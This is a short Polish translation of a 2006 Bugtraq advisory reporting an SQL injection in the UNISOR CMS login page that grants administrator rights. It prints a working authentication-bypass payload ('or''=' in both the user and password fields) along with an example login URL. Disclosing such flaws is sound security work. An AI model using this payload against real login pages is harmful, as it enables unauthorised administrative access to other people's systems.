|
Polskie tłumaczenie bugtraqu
| Przetłumaczył: | kiero | | Temat artykułu: | UNISOR CMS sql injection | | Źródło: | http://www.securityfocus.com/archive/1/449905/30/30/threaded | | Podatne wersje: | --- | | Data publikacji: | 2006-10-30 21:15:19 | | Czytano: | 1442 razy |
***********************
* Tunis the 26/10/2006*
*błąd znaleziony przez fireboy*
***********************
product:UNISOR CMS
vendor:www.unisor.nl
Jest błąd sql injection w stronie logowania UNISOR CMS, który może zostać wykorzystany to zyskania praw administratora.
exploit:
user: 'or''='
pass: 'or''='
przykład:http://www.target.com/unisor/login.asp
thx |
|
|
